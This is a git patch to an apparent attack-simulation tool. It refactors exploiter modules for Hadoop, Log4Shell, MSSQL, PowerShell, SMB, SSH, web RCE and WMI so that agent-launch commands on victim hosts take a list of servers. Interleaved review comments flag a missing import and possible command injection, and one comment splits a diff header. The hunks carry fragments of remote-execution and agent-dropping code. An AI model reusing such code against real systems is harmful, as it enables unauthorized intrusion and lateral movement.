From 42de7140f302453596f4b062302b98c5c82d1c9b Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Fri, 2 Sep 2022 16:13:00 +0200
Subject: [PATCH] Agent: Modify exploiters to use list of servers
---
 monkey/infection_monkey/exploit/hadoop.py | 2 +-
 monkey/infection_monkey/exploit/log4shell.py | 2 +-
 monkey/infection_monkey/exploit/mssqlexec.py | 2 +-
 monkey/infection_monkey/exploit/powershell.py | 8 ++++----
 monkey/infection_monkey/exploit/smbexec.py | 4 ++--
 monkey/infection_monkey/exploit/sshexec.py | 2 +-
 monkey/infection_monkey/exploit/web_rce.py | 6 ++++--
 monkey/infection_monkey/exploit/wmiexec.py | 4 ++--
 8 files changed, 16 insertions(+), 14 deletions(-)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 2c0ceaa73..1b7c54470 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -104,7 +104,7 @@ class HadoopExploiter(WebRCE):
 def _build_command(self, path, http_path):
 # Build command to execute
- monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
+ monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
 if self.host.is_windows():
 base_command = HADOOP_WINDOWS_COMMAND
 else:
diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index fc925091b..399a2706e 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -115,7 +115,7 @@ class Log4ShellExploiter(WebRCE):
 def _build_command(self, path: PurePath, http_path) -> str:
 # Build command to execute
- monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, location=path)
+ monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1, location=path)
 if self.host.is_windows():
 base_command = LOG4SHELL_WINDOWS_COMMAND
 else:
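Review bot: In the hadoop.py hunk, `build_monkey_commandline(self.servers, self.current_depth + 1)` passes the server list straight into the launch command with no check that it is non-empty, and the same applies to the call sites changed in log4shell.py, mssqlexec.py, smbexec.py, sshexec.py, web_rce.py and wmiexec.py. `self.servers` is assigned outside the visible hunks, so whether it can be empty cannot be confirmed from here; if it can, the launched agent would presumably receive no server argument and be unable to report back. A single guard where the attribute is assigned, or inside build_monkey_commandline, would cover every exploiter, e.g. `if not servers: raise ValueError("servers must contain at least one address")`. `_build_command` continues past the end of the hunk.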
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index b037c782a..6fd8e27cb 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -179,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
 def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
 agent_args = build_monkey_commandline(
- self.host, self.current_depth + 1, agent_path_on_victim
+ self.servers, self.current_depth + 1, agent_path_on_victim
 )
 return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
diff --git a/monkey/infection_monkey/exploit/powershell.py b/monkey/infection_monkey/exploit/powershell.py
index d6b626f9f..ff0f0db4e 100644
--- a/monkey/infection_monkey/exploit/powershell.py
+++ b/monkey/infection_monkey/exploit/powershell.py
@@ -15,7 +15,7 @@ from infection_monkey.exploit.powershell_utils.powershell_client import (
 PowerShellClient,
 )
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path, get_random_file_suffix
-from infection_monkey.model import DROPPER_ARG, RUN_MONKEY, VictimHost
+from infection_monkey.model import DROPPER_ARG, RUN_MONKEY
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.utils.threading import interruptible_iter
@@ -169,7 +169,7 @@ class PowerShellExploiter(HostExploiter):
 def _run_monkey_executable_on_victim(self, executable_path):
 monkey_execution_command = build_monkey_execution_command(
- self.host, self.current_depth + 1, executable_path
+ self.servers, self.current_depth + 1, executable_path
 )
 logger.info(
@@ -179,9 +179,9 @@ class PowerShellExploiter(HostExploiter):
 self._client.execute_cmd_as_detached_process(monkey_execution_command)
-def build_monkey_execution_command(host: VictimHost, depth: int, executable_path: str) -> str:
+def build_monkey_execution_command(servers: List[str], depth: int, executable_path: str) -> str:
 monkey_params = build_monkey_commandline(
- target_host=host,
+ servers,
 depth=depth,
 location=executable_path,
 )
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index 272f150eb..abf8b4f47 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -91,14 +91,14 @@ class SMBExploiter(HostExploiter):
 cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
 "dropper_path": remote_full_path
 } + build_monkey_commandline(
- self.host,
+ self.servers,
 self.current_depth + 1,
 str(dest_path),
 )
 else:
 cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
 "monkey_path": remote_full_path
- } + build_monkey_commandline(self.host, self.current_depth + 1)
+ } + build_monkey_commandline(self.servers, self.current_depth + 1)
 smb_conn = None
 for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index 69b29c813..3ff128203 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -245,7 +245,7 @@ class SSHExploiter(HostExploiter):
 try:
 cmdline = f"{monkey_path_on_victim} {MONKEY_ARG}"
- cmdline += build_monkey_commandline(self.host, self.current_depth + 1)
+ cmdline += build_monkey_commandline(self.servers, self.current_depth + 1)
 cmdline += " > /dev/null 2>&1 &"
 ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py
index 4083aa928..f4cbd7948 100644
--- a/monkey/infection_monkey/exploit/web_rce.py
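Review bot: The new signature `build_monkey_execution_command(servers: List[str], ...)` in powershell.py uses `List`, but no hunk in that file adds an import for it; the only import change removes `VictimHost`. Unless `List` is already imported from `typing` above line 15, the annotation is evaluated when the function is defined and the module fails to import with a NameError, so add `from typing import List` if it is missing. The call also drops the keyword on the first argument (`target_host=host` became a bare `servers`) while `depth=` and `location=` stay keyworded; naming it with the helper's parameter name would keep the call self-describing. The function body continues past the end of the hunk.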
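Review bot: In the sshexec.py hunk the result of `build_monkey_commandline(self.servers, self.current_depth + 1)` is concatenated into `cmdline`, which then has ` > /dev/null 2>&1 &` appended and is handed to `ssh.exec_command`, so every server string ends up inside a shell command line. Nothing visible here restricts those strings to an address form; build_monkey_commandline is outside the diff and may already do so. If it does not, validating each entry as `host:port` where the list is built, or quoting entries with `shlex.quote` in the helper for POSIX targets, keeps a malformed entry from changing the command that runs. The enclosing method starts before and ends after the hunk.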
+++ b/monkey/infection_monkey/exploit/web_rce.py
@@ -370,14 +370,16 @@ class WebRCE(HostExploiter):
 default_path = self.get_default_dropper_path()
 if default_path is False:
 return False
- monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, default_path)
+ monkey_cmd = build_monkey_commandline(
+ self.servers, self.current_depth + 1, default_path
+ )
 command = RUN_MONKEY % {
 "monkey_path": path,
 "monkey_type": DROPPER_ARG,
 "parameters": monkey_cmd,
 }
 else:
- monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
+ monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
 command = RUN_MONKEY % {
 "monkey_path": path,
 "monkey_type": MONKEY_ARG,
diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py
index 6c5b189f7..8cfd27a3d 100644
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@@ -103,14 +103,14 @@ class WmiExploiter(HostExploiter):
 cmdline = DROPPER_CMDLINE_WINDOWS % {
 "dropper_path": remote_full_path
 } + build_monkey_commandline(
- self.host,
+ self.servers,
 self.current_depth + 1,
 DROPPER_TARGET_PATH_WIN64,
 )
 else:
 cmdline = MONKEY_CMDLINE_WINDOWS % {
 "monkey_path": remote_full_path
- } + build_monkey_commandline(self.host, self.current_depth + 1)
+ } + build_monkey_commandline(self.servers, self.current_depth + 1)
 # execute the remote monkey
 result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(